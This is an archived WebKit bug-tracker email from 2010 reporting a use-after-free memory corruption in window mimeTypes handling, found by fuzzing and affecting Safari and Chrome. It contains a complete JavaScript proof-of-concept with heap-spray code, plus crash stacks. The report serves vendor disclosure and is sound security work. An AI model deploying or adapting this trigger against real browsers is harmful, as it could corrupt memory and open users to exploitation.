[Webkit-unassigned] [Bug 43297] New: cross_fuzz "plugins" window reload memory corruption

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Sat Jul 31 04:13:26 PDT 2010 

https://bugs.webkit.org/show_bug.cgi?id=43297

           Summary: cross_fuzz "plugins" window reload memory corruption
           Product: WebKit
           Version: 528+ (Nightly build)
          Platform: PC
        OS/Version: Windows Vista
            Status: NEW
          Severity: Major
          Priority: P1
         Component: HTML DOM
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: skylined at chromium.org
                CC: eric at webkit.org
            Blocks: 42959


Created an attachment (id=63148)
 --> (https://bugs.webkit.org/attachment.cgi?id=63148)
Repro

This bug is similar to bug 43295 and 31886 in that it is also a use-after-free bug triggered by getting a certain property of a window object and reloading/closing the window before using the property.

<script>
  var target_window, mimeType;
  function step1() {
    console.log('step1');
    target_window = window.open("");
    mimeType = target_window.clientInformation.mimeTypes[0];
    console.log('step2');
    target_window.close();
    setTimeout(step2, 100);
  }
  function step2() {
    heap_corrupt();
    try {target_window.postMessage(mimeType); } catch(e) {}
    console.log('reload');
    location.reload();
  }
  function heap_corrupt() {
    console.log('heap corrupted');
    var a = [];
    for(var si = 0; si < 0x100; si++) {
      try { a.push(new WebGLByteArray(si)) } catch (e) {}
      a.push(new Array(si).join('A'));
    }
    for (var li = 0x200; li < 0x10000; li <<= 1) {
      try { a.push(new WebGLByteArray(li)); } catch (e) {}
      a.push(new Array(li).join('A'));
    }
    delete a;
    gc();
  }
  step1();
</script>

Stacks vary, as the use-after-free can lead to unpredictable behavior. A common stack in Chromium is:
stack:          WebCore::SubframeLoader::allowPlugins
                WebCore::DOMMimeType::enabledPlugin
                WebCore::DOMMimeTypeInternal::enabledPluginAttrGetter
                v8::internal::Object::GetPropertyWithCallback
                v8::internal::Object::GetProperty
                v8::internal::Object::GetPropertyWithReceiver
                v8::internal::Runtime::GetObjectProperty
                v8::internal::GetProperty
                ...
Safari gave me this:
stack:          WebCore::MimeType::enabledPlugin
                WebCore::jsMimeTypeEnabledPlugin
                JSC::PropertySlot::getValue
                WebCore::SerializingTreeWalker::getProperty
                WebCore::walk<...>
                WebCore::SerializedScriptValueData::serialize
                WebCore::JSDOMWindow::postMessage
                WebCore::jsDOMWindowPrototypeFunctionPostMessage
                ...

This affects Safari 5, WebKit Nightly, Chrome 5 and Chromium latest and probably everything using WebKit.

-- 
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.

More information about the webkit-unassigned mailing list